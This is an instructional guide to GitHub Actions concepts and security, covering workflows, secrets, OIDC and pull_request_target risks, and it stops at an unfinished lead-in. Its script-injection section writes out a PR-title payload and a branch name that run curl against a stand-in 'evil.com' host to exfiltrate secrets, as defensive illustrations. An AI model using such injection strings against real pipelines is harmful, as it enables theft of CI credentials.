GitHub Actions Deep Intuition
An experienced engineer's guide to GitHub Actions
1. One-Sentence Essence
GitHub Actions is an event-driven job runner welded directly to a Git repository — the repository is the source of truth for what runs, when it runs, and who it speaks for.
Read that sentence three times. Most of what’s confusing about Actions falls out of those four ideas: events, jobs, the welded-to-the-repo part, and the identity (“who it speaks for”). The platform isn’t really “CI/CD.” CI/CD is one thing you can build with it. At its core it is a generic mechanism for “when something happens to a repo, run some YAML, with credentials scoped to that repo.” Once you see it that way, you stop being surprised that people use it for stale-issue triage, dependency updates, release publishing, ChatOps, security scans, and yes, build-test-deploy.
The “welded to the repo” part is the key thing other CI systems don’t have. Jenkins is a server you point at a repo. CircleCI is an account you connect to a repo. Actions lives in the repo — the workflow files are version-controlled alongside your code, the identity tokens encode the repo and branch, the secrets scope is the repo, the audit log is the repo. This is the dominant architectural decision and most of the strengths and weaknesses of the platform are downstream of it.
2. The Problem It Solved
Before Actions launched in late 2018, the typical setup for an open-source GitHub project was: code on GitHub, CI somewhere else. Travis CI ran your tests, CircleCI built your Docker images, Jenkins (someone’s lovingly maintained Jenkins) deployed your release. Each system was a separate account, a separate config file (.travis.yml, .circleci/config.yml, a Jenkinsfile), a separate webhook, a separate dashboard, separate secrets management. To set up CI for a new repo you went through five integration flows. To debug a failed build you tabbed between GitHub for the code and a different domain for the logs.
The friction was real but not catastrophic. What pushed GitHub to build Actions was something more strategic: every external CI was a place where developers spent serious time outside GitHub. Every minute on Travis was a minute not on github.com. And — perhaps more importantly — every external CI was a separate system with its own auth, its own token model, its own way of handling secrets. The blast radius of a compromised CircleCI token was unclear in a way that the blast radius of a GitHub token wasn’t.
The insight that drove Actions: what if the CI system was the source-control host? Then workflows live with the code (versioned, reviewable, branchable). Then the identity system is the same one you already have (GitHub identity, repo-scoped tokens). Then there’s no integration step — push a YAML file and it runs. Then there’s a marketplace of pre-built steps anyone can publish, because everyone already has a GitHub account.
There was also a less idealistic motive: locking developers into the GitHub ecosystem. Once your build, deploy, and release tooling is GitHub-flavored YAML calling GitHub-published actions backed by GitHub-hosted runners with GitHub-stored secrets, leaving GitHub becomes a multi-month migration. The platform did solve a real friction problem, and it deepened lock-in. Both things are true.
The result, as of 2026: GitHub reports running on the order of tens of millions of jobs per day, and the Actions Marketplace has become the de facto CI plugin ecosystem for open source. Travis is largely a memory; CircleCI and Jenkins remain but increasingly as specialists rather than defaults.
3. The Concepts You Need
Actions has more vocabulary than most engineers realize, and a fair chunk of the confusion in the field comes from people using these terms loosely. Get these crisp before going further.
The execution hierarchy:
- Workflow: a YAML file in .github/workflows/. One file = one workflow. The workflow declares what triggers it (on:) and what jobs it contains.
- Event: the thing that triggers a workflow. push, pull_request, schedule, workflow_dispatch (manual button), repository_dispatch (external API call), release, issue_comment, plus a few dozen others. Each event carries a JSON payload, exposed as the github.event context.
- Job: a unit of work that runs on a single runner. A workflow has one or more jobs. By default jobs run in parallel; needs: makes one wait for another. Each job gets a fresh runner (or runner container).
- Step: a single command or action invocation inside a job. Steps in a job run sequentially in the same runner, sharing the filesystem and environment. A step is either run: <shell> or uses: <action>.
- Action: a reusable, packaged unit invoked from a step. An action is a directory with an action.yml manifest, hosted in a Git repo, referenced as owner/repo@ref. There are three kinds: JavaScript actions (run by a Node runtime baked into the runner), Docker actions (the runner pulls and runs a container), and composite actions (a list of steps wrapped as an action).
Where things run:
- Runner — a process that executes a job. It’s a long-running daemon (the “runner agent,” written in C#) that polls GitHub for work, pulls a job, runs it, and reports results. The runner can live on GitHub-hosted infrastructure (you don’t see it) or on your own machines (self-hosted).
- GitHub-hosted runner — a fresh, ephemeral VM (Ubuntu, Windows, or macOS) provisioned by GitHub for one job and destroyed afterward. Pre-loaded with a wild amount of tooling (Docker, gcloud, kubectl, Java, Node, Python, .NET, etc.).
- Self-hosted runner — a runner you operate. Often a Kubernetes pod, often ephemeral, but the lifecycle is yours.
- Larger runner / GPU runner — paid GitHub-hosted SKUs with more CPU/RAM/GPU.
Reuse and modularity:
- Composite action: multiple steps bundled into something callable as a single step (uses:). Lives anywhere in a repo (often .github/actions/<name>/action.yml). Same job, same runner, no isolation.
- Reusable workflow: an entire workflow callable from another workflow via workflow_call. Lives in .github/workflows/. Each call spawns its own jobs (potentially on different runners). More heavyweight than composite actions; can use secrets: inherit.
- Marketplace action: a third-party action published in a public repo and listed in the GitHub Marketplace. You consume them with uses: owner/repo@ref.
Identity, secrets, permissions:
- GITHUB_TOKEN: an automatic, ephemeral token minted at the start of each job. Authenticated as the repo (technically a GitHub App installation token, not a user), scoped by the permissions: block of the workflow. It expires when the job finishes.
- Secret: an encrypted value stored at repo, environment, or organization level. Read through the secrets context (usually mapped into an env var), masked in logs, never sent to fork PRs by default.
- Variable (vars) — like secrets but not encrypted; for non-sensitive config (a feature flag, a region name).
- Environment: a named deployment target (staging, production) that gates a job. Environments can require manual approval, restrict which branches deploy to them, and hold their own secrets. The single most important security primitive in Actions.
- OIDC token / id-token: a short-lived JWT that GitHub Actions can mint, encoding the repo, ref, and environment. Cloud providers can be configured to trust this token, eliminating long-lived static credentials. The modern way to authenticate to AWS, GCP, Azure, npm, PyPI, and so on.
Dangerous events you must know by name:
- pull_request: runs in the context of the PR’s fork. By default no secrets, read-only token. Safe.
- pull_request_target: runs in the context of the base repo with full secrets. Dangerous if you check out the PR’s code.
- workflow_run: runs after another workflow completes, in the base context with secrets. Has the same danger profile as pull_request_target.
These will come up repeatedly. If you don’t have crisp mental images of pull_request vs pull_request_target, the security section won’t land.
Storage:
- Artifact: a file or directory uploaded by a job for sharing with later jobs or for download from the UI. Stored ~90 days (configurable). Uploaded with actions/upload-artifact, retrieved with actions/download-artifact.
- Cache: keyed blobs of files (typically dependency caches like ~/.npm or ~/.cargo) restored at the start of a job and saved at the end when no entry exists yet for the key. Entries auto-evict after 7 days of no access. 10 GB free per repo, then billed.
- Workflow run / job logs: streamed live to GitHub’s UI and retained with the run (90 days by default).
Contexts and expressions:
- Context: a structured data object available in expressions: github (event payload, repo, actor, ref), env, secrets, vars, steps (outputs from prior steps), needs (outputs from prerequisite jobs), runner, job, matrix.
- Expression: ${{ ... }} syntax. Evaluated by GitHub before the YAML reaches the runner. This evaluation-before-execution is the source of the script injection class of bugs.
If you’ve absorbed all this, the rest of the document will land cleanly. If “composite action vs reusable workflow” or “pull_request vs pull_request_target” still feel hazy, re-read those two clusters before moving on.
4. The Distilled Introduction
4.1 The minimal viable workflow
A workflow file lives at .github/workflows/ci.yml. The directory must be exact — subdirectories are not supported. The filename is up to you. Here is a complete, functioning workflow:
name: CI
on:
  push:
    branches: [main]
  pull_request:
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: '20'
          cache: 'npm'
      - run: npm ci
      - run: npm test
Read that top-down. name: is the human-readable label in the UI. on: lists the triggering events — here, every push to main and every pull request opened against any branch. jobs: is a map of job names to job definitions. runs-on: says where to run (ubuntu-latest is a GitHub-hosted Linux VM). steps: is the ordered list of work.
The first step uses actions/checkout@v4 — the official action that clones your repo into the runner’s filesystem. This is not automatic. A fresh runner starts with no source code; you must explicitly check it out. Forgetting this is the most common first-day mistake. The second step installs Node 20 and configures npm caching (the cache: 'npm' option triggers integration with the runner’s cache). The remaining two steps install dependencies and run tests.
Push that file to the repo. The next push or PR will trigger the workflow. You’ll see the run appear under the Actions tab.
4.2 The trigger model
on: accepts many forms. The variations matter:
on:
  # Multiple events
  push:
    branches: [main, 'release/*']
    # paths and paths-ignore cannot be combined on one event;
    # a leading ! inside paths excludes files instead.
    paths: ['src/**', 'package.json', '!**/*.md']
  pull_request:
    types: [opened, synchronize, reopened]
  # Cron schedule (UTC)
  schedule:
    - cron: '0 6 * * 1'   # Mondays at 06:00 UTC
  # Manual button in UI
  workflow_dispatch:
    inputs:
      environment:
        type: choice
        options: [staging, production]
  # Called by another workflow
  workflow_call:
    inputs:
      version:
        type: string
        required: true
Notes that aren’t obvious from the docs:
- paths: and paths-ignore: filter at the file level. If a push doesn’t touch matching files, the workflow doesn’t run. Useful for monorepos. The two filters cannot be combined on the same event; to exclude files, add a !-prefixed pattern to paths: instead.
- schedule: cron is UTC. There is no SLA for cron precision. Scheduled workflows can be delayed by minutes during high load, so don’t rely on them for tight intervals.
- workflow_dispatch: gives you a “Run workflow” button in the UI plus a REST API endpoint. Inputs become ${{ inputs.environment }}.
- For the full list of types, branch filters, and so on for any event, the “Events that trigger workflows” page in the GitHub docs is canonical.
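As a rough illustration of how a workflow_dispatch input is consumed, here is a minimal sketch of a manually triggered workflow. The workflow name and deploy.sh are hypothetical; the input is passed through env: rather than inlined into the script, for the reasons Section 5 covers.

```yaml
# Sketch only: "Manual deploy" and deploy.sh are illustrative names.
name: Manual deploy
on:
  workflow_dispatch:
    inputs:
      environment:
        description: Where to deploy
        type: choice
        options: [staging, production]
        required: true
jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      # The input reaches the script as an environment variable, not as script text.
      - run: ./deploy.sh "$TARGET_ENV"
        env:
          TARGET_ENV: ${{ inputs.environment }}
```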
4.3 Jobs, dependencies, and parallelism
Jobs run in parallel by default. To serialize, use needs::
jobs:
  lint:
    runs-on: ubuntu-latest
    steps: [...]
  test:
    runs-on: ubuntu-latest
    steps: [...]
  build:
    needs: [lint, test]
    runs-on: ubuntu-latest
    steps: [...]
  deploy:
    needs: build
    runs-on: ubuntu-latest
    if: github.ref == 'refs/heads/main'
    environment: production
    steps: [...]
lint and test run in parallel. build waits for both. deploy waits for build, runs only on main, and references the production environment, so it pauses for whatever protection rules that environment has (manual approval, branch restriction, etc.).
Each job gets its own runner. Jobs do not share filesystem or environment. If you want to pass data between jobs, you have three mechanisms:
- Outputs: small string values declared in outputs: and consumed via ${{ needs.build.outputs.version }}.
- Artifacts: files uploaded by one job and downloaded by another.
- Cache: for dependency caches across runs of the same job.
Mixing these up is a common beginner mistake. Outputs are for strings (a version number, a commit SHA). Artifacts are for files (a built binary). Cache is for the same job across runs (npm packages on every PR).
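To make the distinction concrete, here is a minimal sketch that passes a string via a job output and a directory via an artifact. The job names, the artifact name dist, and the assumption that npm run build writes to dist/ are all illustrative.

```yaml
jobs:
  build:
    runs-on: ubuntu-latest
    outputs:
      # Job output: re-exports a step output so downstream jobs can read it.
      version: ${{ steps.meta.outputs.version }}
    steps:
      - uses: actions/checkout@v4
      - id: meta
        run: echo "version=$(jq -r .version package.json)" >> "$GITHUB_OUTPUT"
      - run: npm ci && npm run build   # assumes a "build" script that writes dist/
      - uses: actions/upload-artifact@v4
        with:
          name: dist
          path: dist/
  publish:
    needs: build
    runs-on: ubuntu-latest
    steps:
      # Files travel as an artifact; this job starts on a fresh runner with an empty workspace.
      - uses: actions/download-artifact@v4
        with:
          name: dist
          path: dist
      - run: echo "Publishing $VERSION" && ls dist
        env:
          VERSION: ${{ needs.build.outputs.version }}
```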
4.4 Steps, shells, and the run command
Steps run sequentially in the same runner. run: executes shell commands; the default shell is bash on Linux/macOS, pwsh on Windows. Multiline scripts use |:
- name: Build and tag
  run: |
    VERSION=$(jq -r .version package.json)
    echo "Building $VERSION"
    docker build -t "myapp:$VERSION" .
    echo "VERSION=$VERSION" >> "$GITHUB_ENV"
The >> $GITHUB_ENV trick exports an env var to subsequent steps. Likewise >> $GITHUB_OUTPUT writes a step output, >> $GITHUB_PATH prepends a directory to PATH for later steps, and >> $GITHUB_STEP_SUMMARY writes Markdown that appears in the run summary. These four files ($GITHUB_ENV, $GITHUB_OUTPUT, $GITHUB_PATH, $GITHUB_STEP_SUMMARY) are how a run: step communicates back to the workflow engine.
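The two less familiar files, $GITHUB_PATH and $GITHUB_STEP_SUMMARY, can be sketched as follows. The tool name mytool is made up for the example; it is just a two-line shell script created on the spot.

```yaml
steps:
  - name: Install a local tool and expose it
    run: |
      mkdir -p "$HOME/.local/bin"
      # mytool is a hypothetical stand-in for any binary you download or build.
      printf '#!/bin/sh\necho hello from mytool\n' > "$HOME/.local/bin/mytool"
      chmod +x "$HOME/.local/bin/mytool"
      # Takes effect for later steps, not for the rest of this one.
      echo "$HOME/.local/bin" >> "$GITHUB_PATH"
  - name: Use it and write a summary
    run: |
      mytool
      {
        echo "### Build report"
        echo "- tool output: $(mytool)"
      } >> "$GITHUB_STEP_SUMMARY"
```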
Step IDs let later steps reference earlier ones:
- id: meta
  run: echo "tag=v$(date +%Y%m%d)" >> "$GITHUB_OUTPUT"
- run: echo "Tag is ${{ steps.meta.outputs.tag }}"
4.5 Using actions
The uses: keyword invokes an action. The reference is owner/repo@ref:
- uses: actions/checkout@v4 # tag, mutable
- uses: actions/checkout@08c6903cd8c0fde910a37f88322edcfb5dd907a8 # SHA, immutable
- uses: ./.github/actions/my-local-action # local action in this repo
- uses: docker://alpine:3.19 # Docker image directly
Inputs are passed via with::
- uses: actions/setup-python@v5
  with:
    python-version: '3.12'
    cache: 'pip'
The action’s action.yml defines what inputs it accepts and what outputs it emits. Outputs appear under ${{ steps.<id>.outputs.<name> }} if you give the step an id:.
Pinning is non-trivial and matters for security. Three options:
- Major tag (@v4): convenient, mutable, the maintainer can change what it points to.
- Specific tag (@v4.1.2): still mutable; a tag can be force-pushed.
- Full commit SHA (@08c6...): immutable. Cannot be changed without a full SHA-1 collision.
For first-party actions/* actions on personal projects, major tags are fine. For third-party actions touching anything sensitive (deploys, releases, secrets), pin to SHA. Section 7 and Section 11 explain why this matters.
4.6 Matrix builds — running variations in parallel
Matrix is the killer feature for testing across versions:
jobs:
  test:
    runs-on: ${{ matrix.os }}
    strategy:
      fail-fast: false
      matrix:
        os: [ubuntu-latest, macos-latest, windows-latest]
        python: ['3.10', '3.11', '3.12']
        include:
          - os: ubuntu-latest
            python: '3.13'
            experimental: true
        exclude:
          - os: windows-latest
            python: '3.10'
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: ${{ matrix.python }}
      - run: pytest
This expands to a Cartesian product (3 OS × 3 Python = 9 jobs), minus excludes, plus includes. fail-fast: false keeps all matrix jobs running even if one fails — by default GitHub cancels siblings on failure, which is occasionally useful but usually not what you want.
max-parallel: caps concurrency within the matrix. Without it, all combinations run in parallel up to your account’s concurrency limit (typically 20-180 depending on plan).
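A small sketch of max-parallel in context, which also shows one way a flag such as experimental could be put to use: allowing flagged entries to fail without failing the run. The cap of 4 and the reduced matrix are arbitrary choices for illustration.

```yaml
jobs:
  test:
    runs-on: ${{ matrix.os }}
    # Entries without the flag evaluate to false here, so only flagged ones may fail quietly.
    continue-on-error: ${{ matrix.experimental == true }}
    strategy:
      fail-fast: false
      max-parallel: 4          # at most four matrix jobs at once
      matrix:
        os: [ubuntu-latest, windows-latest]
        python: ['3.11', '3.12']
        include:
          - os: ubuntu-latest
            python: '3.13'
            experimental: true
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: ${{ matrix.python }}
      - run: python -m pip install pytest
      - run: pytest
```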
4.7 Secrets, variables, and the permissions block
Secrets are encrypted, set in repo/org/environment settings, and accessed via ${{ secrets.NAME }}. They’re auto-masked in logs:
jobs:
  deploy:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      id-token: write        # required for OIDC
      pull-requests: write   # required to comment on PRs
    steps:
      - uses: actions/checkout@v4
      - run: ./deploy.sh
        env:
          DEPLOY_TOKEN: ${{ secrets.DEPLOY_TOKEN }}
          REGION: ${{ vars.REGION }}
The permissions: block scopes the automatically-injected GITHUB_TOKEN. If you set any permission, all unspecified permissions are set to none. This is a security feature, not a bug. The default — when no permissions: block exists — depends on a repo setting, but the modern best practice is “specify what you need, deny everything else.”
Variables (${{ vars.X }}) are like secrets but unencrypted, for non-sensitive configuration. They’re not masked in logs.
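One common way to apply “specify what you need, deny everything else” is a read-only default at the workflow level with a single job that elevates. The sketch below assumes a tag-triggered release; the workflow and job names are illustrative.

```yaml
name: Release
on:
  push:
    tags: ['v*']
# Workflow-wide default: read-only.
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest       # inherits contents: read
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
  release:
    needs: test
    runs-on: ubuntu-latest
    # A job-level block replaces the workflow-level one for this job only.
    permissions:
      contents: write            # needed to create a GitHub release
    steps:
      - uses: actions/checkout@v4
      - run: gh release create "$GITHUB_REF_NAME" --generate-notes
        env:
          GH_TOKEN: ${{ github.token }}
```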
4.8 Caching — the single biggest performance lever
Most CI time is spent installing dependencies. Cache them:
- uses: actions/cache@v4
  with:
    path: |
      ~/.cargo/registry
      ~/.cargo/git
      target
    key: cargo-${{ runner.os }}-${{ hashFiles('**/Cargo.lock') }}
    restore-keys: |
      cargo-${{ runner.os }}-
The key: is the exact match — cache hit means a perfect restore. The restore-keys: are prefix-fallback patterns — partial match restores the most recent matching cache, then the build process can update from there. For lockfile-based ecosystems, hashing the lockfile is the standard pattern: any change to dependencies invalidates the cache.
For most languages, the language-specific setup actions (setup-node, setup-python, setup-go) have a cache: parameter that handles this for you. Use that when available.
Caches expire after 7 days unused. The 10 GB per-repo limit is shared across all caches; oldest entries evict first.
4.9 The PR workflow — the hard one
This is where things get sharp. A typical setup:
# .github/workflows/pr-checks.yml
name: PR checks
on:
  pull_request:
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci
      - run: npm test
Crucially: when this triggers from a fork’s PR, the GITHUB_TOKEN is read-only and no secrets are passed. This is by design and is what makes pull_request safe. Forks can’t exfiltrate your secrets through your CI.
But this means you can’t do everything. You can’t post coverage comments back to the PR (no write permission). You can’t deploy a preview environment (no deploy secrets). The temptation is to switch to pull_request_target — which runs in the base repo’s context with full secrets and write permissions. Resist this. See Section 7. The correct pattern is the workflow_run split: one untrusted workflow runs the build and uploads artifacts, then a second workflow triggered by workflow_run consumes the artifacts in the privileged context.
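The privileged half of that split might look roughly like the sketch below. It assumes the untrusted “PR checks” workflow uploads an artifact named coverage-report containing pr-number.txt and summary.md; those names, and the file pr-comment.yml itself, are hypothetical. Nothing from the PR is checked out or executed here, and the artifact contents are validated before use.

```yaml
# .github/workflows/pr-comment.yml (hypothetical file name)
name: PR comment
on:
  workflow_run:
    workflows: ["PR checks"]
    types: [completed]
permissions:
  actions: read          # download artifacts from the triggering run
  pull-requests: write   # post the comment
jobs:
  comment:
    if: >-
      github.event.workflow_run.event == 'pull_request' &&
      github.event.workflow_run.conclusion == 'success'
    runs-on: ubuntu-latest
    steps:
      - uses: actions/download-artifact@v4
        with:
          name: coverage-report
          path: report
          run-id: ${{ github.event.workflow_run.id }}
          github-token: ${{ github.token }}
      - name: Validate and post
        env:
          GH_TOKEN: ${{ github.token }}
          GH_REPO: ${{ github.repository }}
        run: |
          pr_number="$(cat report/pr-number.txt)"
          # Artifact contents are attacker-controlled: accept digits only.
          [[ "$pr_number" =~ ^[0-9]+$ ]] || { echo "unexpected PR number"; exit 1; }
          gh pr comment "$pr_number" --body-file report/summary.md
```

The comment body still comes from untrusted input, so this sketch only ever treats it as text to post, never as something to execute.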
4.10 Concurrency control
concurrency: lets you serialize or cancel competing runs:
concurrency:
  group: ci-${{ github.ref }}
  cancel-in-progress: true
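This is essential for two patterns. (1) On PRs, you want the new commit to cancel the previous CI run: it saves minutes and gives faster feedback. (2) On deploys, you want one deployment in flight at a time, with new ones queueing, so set cancel-in-progress: false. Note that a group holds at most one running and one pending run; a newer pending run replaces an older pending one, so this is not an unbounded queue.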
The group: is just a string. Two runs with the same group conflict. Common keys: ${{ github.workflow }}-${{ github.ref }} (per-workflow per-branch).
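Both patterns can live in one workflow by setting concurrency at the job level. This is a sketch under assumed names (deploy-production as the group, deploy.sh as the deploy script), not a prescribed layout.

```yaml
name: CI and deploy
on:
  pull_request:
  push:
    branches: [main]
jobs:
  test:
    runs-on: ubuntu-latest
    concurrency:
      group: test-${{ github.workflow }}-${{ github.ref }}
      # Cancel superseded runs on PRs, but let runs on main finish.
      cancel-in-progress: ${{ github.event_name == 'pull_request' }}
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
  deploy:
    needs: test
    if: github.ref == 'refs/heads/main'
    runs-on: ubuntu-latest
    environment: production
    concurrency:
      group: deploy-production   # one deployment in flight at a time
      cancel-in-progress: false
    steps:
      - uses: actions/checkout@v4
      - run: ./deploy.sh         # hypothetical deploy script
```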
4.11 Reusable workflows and composite actions
If you write the same 30 lines of YAML in five repos, factor it out. Two mechanisms:
Composite action — bundles steps. Lives in .github/actions/setup/action.yml:
name: 'Setup project'
inputs:
  node-version:
    default: '20'
runs:
  using: composite
  steps:
    - uses: actions/setup-node@v4
      with:
        node-version: ${{ inputs.node-version }}
        cache: npm
    - run: npm ci
      shell: bash
Used like any other action: - uses: ./.github/actions/setup. The shell: is required for every run: step in a composite action — it doesn’t inherit the workflow default.
Reusable workflow — bundles whole jobs. Lives in .github/workflows/build.yml:
on:
  workflow_call:
    inputs:
      env:
        type: string
    secrets:
      DEPLOY_TOKEN:
        required: true
jobs:
  deploy:
    runs-on: ubuntu-latest
    steps: [...]
Called from another workflow:
jobs:
  deploy-staging:
    uses: my-org/templates/.github/workflows/build.yml@main
    with:
      env: staging
    secrets:
      DEPLOY_TOKEN: ${{ secrets.STAGING_DEPLOY_TOKEN }}
    # or `secrets: inherit` to pass everything
The judgment call between the two is in Section 8. The short version: composite for shared steps within a job, reusable for shared jobs across workflows.
4.12 OIDC — the “no more long-lived secrets” pattern
The single most important security upgrade you can make. Instead of storing AWS access keys as secrets, configure AWS to trust GitHub’s OIDC provider, and have your workflow exchange a short-lived JWT for short-lived AWS credentials:
permissions:
  id-token: write
  contents: read
jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::123456789012:role/GitHubDeploy
          aws-region: us-east-1
      - run: aws s3 sync ./dist s3://my-bucket
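No AWS_ACCESS_KEY_ID secret. The IAM role’s trust policy says “I trust GitHub’s OIDC issuer, but only for tokens whose subject is repo:my-org/my-repo:ref:refs/heads/main.” The resulting AWS credentials are short-lived: they expire with the role session (typically an hour unless configured otherwise) rather than living until someone remembers to rotate them. If the runner is compromised mid-job, the stolen credentials stop working soon afterwards. If your repo is compromised after the fact, there are no static keys to rotate.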
Every major cloud (AWS, GCP, Azure) supports this. So do package registries (npm, PyPI, RubyGems, NuGet, crates.io) via “trusted publishing.” If you’re still using long-lived deploy keys in 2026, you’re on the wrong side of history.
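On the AWS side, the trust policy described above could be expressed as a CloudFormation fragment along these lines. It is a sketch that assumes the GitHub OIDC provider is already registered in the account and that the job does not use an environment (which would change the subject claim); the role's permission policies are omitted.

```yaml
# CloudFormation sketch; attach permission policies separately.
Resources:
  GitHubDeployRole:
    Type: AWS::IAM::Role
    Properties:
      RoleName: GitHubDeploy
      AssumeRolePolicyDocument:
        Version: '2012-10-17'
        Statement:
          - Effect: Allow
            Principal:
              Federated: !Sub 'arn:aws:iam::${AWS::AccountId}:oidc-provider/token.actions.githubusercontent.com'
            Action: sts:AssumeRoleWithWebIdentity
            Condition:
              StringEquals:
                # Audience used by the official AWS credentials action.
                'token.actions.githubusercontent.com:aud': 'sts.amazonaws.com'
                # Only workflows running on main in this one repo may assume the role.
                'token.actions.githubusercontent.com:sub': 'repo:my-org/my-repo:ref:refs/heads/main'
```

Matching the subject with StringEquals rather than a wildcard is the design choice that matters: a loose pattern such as repo:my-org/* would let any repo in the org assume the role.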
4.13 Debugging workflows
The basics:
- Re-run failed jobs only: UI button. Saves rerunning the whole workflow.
- Re-run with debug logging: sets ACTIONS_RUNNER_DEBUG=true and ACTIONS_STEP_DEBUG=true, dumping verbose logs.
- tmate: third-party action mxschmitt/action-tmate that opens an SSH session into the runner. Saved my life many times. Do not use on untrusted code.
- act: local runner emulator (a separate tool, nektos/act). Lets you test workflows on your laptop. Imperfect emulation but catches a lot of bugs before pushing.
- actionlint: static analysis for workflow YAML. Run it in CI to catch typos in expressions, undefined contexts, shell mistakes.
- zizmor: security-focused linter for workflows. Catches script injection, dangerous triggers, unpinned actions. Strongly recommended.
You will, sooner or later, push a workflow change and watch it fail with Invalid workflow file and no useful detail. Run actionlint locally; the error messages are dramatically better.
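A minimal sketch of running actionlint in CI, using the Docker image its maintainers publish, with an optional tmate shell that opens only on manually triggered runs that fail. The workflow name and the choice to gate tmate on workflow_dispatch are assumptions for illustration.

```yaml
name: Lint workflows
on:
  pull_request:
    paths: ['.github/workflows/**']
  workflow_dispatch:
permissions:
  contents: read
jobs:
  actionlint:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run actionlint
        uses: docker://rhysd/actionlint:latest
        with:
          args: -color
      # Debug shell: only on manual runs, and only for the person who triggered them.
      - name: Open a tmate session on failure
        if: failure() && github.event_name == 'workflow_dispatch'
        uses: mxschmitt/action-tmate@v3
        with:
          limit-access-to-actor: true
```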
5. The Mental Model
Core Idea 1: The repo is the source of truth — for code, config, and identity.
Other CI systems treat the repo as input. Workflows live elsewhere — on a Jenkins server, in a CircleCI account. The CI system has its own identity, and you grant it access to your repo.
Actions inverts this. The workflow YAML is in the repo. The identity is the repo. The token is scoped to the repo. The default secrets are scoped to the repo. The OIDC token’s sub claim is the repo plus ref. The audit log is part of the repo’s audit log.
This predicts:
- Workflow changes are PR-able. You can review CI changes the same way you review code. You can revert them. You can branch them.
- The dangerous events all flow from this. pull_request_target exists because GitHub had to figure out what identity to use for a PR from a fork: does the workflow run as “the fork” (no secrets, safe) or as “the base repo” (full secrets, dangerous)? They had to make this an explicit choice and named the dangerous one with a deceptively neutral name. (This was, in retrospect, a mistake.)
- Forks are special. A fork is a different repo. A PR from a fork is “code from another repo trying to influence what runs in our repo.” Most of the security model is about navigating this.
- Cross-repo orchestration is painful. Because everything is repo-scoped, doing things that span repos (a build in one repo triggering a deploy in another) requires explicit cross-repo plumbing: repository_dispatch events, fine-grained PATs, GitHub Apps. The platform doesn’t want to be cross-repo. If your architecture is multi-repo, expect friction.
- Self-hosted runners inherit this scope. A self-hosted runner is registered to a repo, an org, or an enterprise. The scope determines who can run jobs on it. A repo-scoped runner is safe-ish for a private repo. A repo-scoped runner attached to a public repo is a remote code execution oracle: anyone who can submit a PR can run code on your runner.
If you remember nothing else from this section, remember: the repo is the trust boundary. Every weird thing about Actions that surprises you, you can usually figure out by asking “what would this look like if the repo were the unit of trust?”
Core Idea 2: Expressions are evaluated by the workflow engine before the runner sees the YAML.
This is the architectural decision behind the entire script-injection class of bugs.
When you write ${{ github.event.pull_request.title }} in a workflow, here’s what actually happens:
- The workflow engine on GitHub’s servers receives the event.
- It parses the YAML.
- It evaluates all ${{ ... }} expressions, substituting the values into the YAML text.
- The resulting expanded YAML is sent to the runner.
- The runner executes whatever shell commands the YAML now contains.
Now consider this:
- run: echo "Title was: ${{ github.event.pull_request.title }}"
If the PR title is "; curl evil.com/exfil?secrets=$AWS_SECRET; echo ", then by the time the runner sees this step, the YAML reads:
- run: echo "Title was: "; curl evil.com/exfil?secrets=$AWS_SECRET; echo ""
The runner has no idea this came from user input. It just runs the shell. This is the original sin of the expression system, and every “use environment variables not interpolation” guideline traces back to it.
This predicts:
- Untrusted input must never flow into run: blocks via ${{ }}. Always pass through env: instead. An environment variable’s value reaches the shell as data, not as script text.
- Action inputs have the same problem. with: values that get interpolated into shells inside the action propagate the vulnerability. Many marketplace actions have CVEs of exactly this shape.
- Branch names, issue titles, PR bodies, commit messages, author names: all flexible, attacker-controllable strings. All have appeared as injection points in real CVEs.
- Even “obviously safe” fields aren’t. Git refs cannot contain spaces, but branch names like zzz";curl${IFS}evil.com;# are valid and expand to a working command. Email addresses are surprisingly permissive.
The mitigation is mechanical:
# DON'T
- run: echo "Title: ${{ github.event.pull_request.title }}"
# DO
- run: echo "Title: $TITLE"
  env:
    TITLE: ${{ github.event.pull_request.title }}
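The env-var approach works because the expression is now expanded into an environment variable’s value, not into the script text. The shell expands $TITLE at run time and, inside double quotes, treats the result as plain data rather than re-parsing it as shell syntax.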
These two ideas — repo-as-trust-boundary and pre-execution-expression-eval — explain probably 80% of the things that surprise people about Actions. Section 7 spells out specific gotchas; they all reduce back to one of these two.
6. The Architecture in Plain English
Walk through what actually happens when you push code:
- Event ingestion. GitHub’s core platform notices an event — a push, a PR opened, a cron trigger fires. The Actions service receives this event.
- Workflow planning. The Actions service scans .github/workflows/ on the relevant ref, parses each file, and decides which workflows match the event. For each matching workflow, it builds a dependency graph (DAG) of jobs and figures out which can run immediately (no needs:).
- Job dispatch. Each ready job goes into a queue keyed by its runs-on: value. For ubuntu-latest, this queues against GitHub’s hosted-runner pool. For a self-hosted label like gpu-cluster, it queues against runners advertising that label.
- Runner pickup. Runners poll the Actions service via long-poll HTTPS: they hold a connection open for up to ~50 seconds waiting for a job. When a job is available, the runner gets a sessionId and starts pulling job details.
- Execution. The runner spins up a Worker process. The Worker downloads the workflow YAML (already with expressions evaluated), pulls referenced actions (Git clones for JS/composite actions, docker pull for container actions), and executes steps in order.
- Cleanup. GitHub-hosted runners are destroyed after the job. Ephemeral self-hosted runners deregister and shut down. Persistent self-hosted runners go back to polling.
Where state lives, which is the key insight:
- Workflow definitions — in your Git repo. Versioned with code.
- Run history, logs, artifacts — in GitHub’s storage, retained 90 days by default.
- Secrets — encrypted in GitHub’s vault, decrypted at job start, injected into the runner’s environment.
- Cache entries: in GitHub-managed blob storage (Azure Blob Storage at the time of writing), keyed per-repo.
- OIDC tokens — minted on demand by GitHub’s OIDC provider; never stored.
- Runner state — for GitHub-hosted runners, none persists across jobs. For self-hosted, whatever you let persist (this is itself a security concern).
A few things worth knowing about the production architecture:
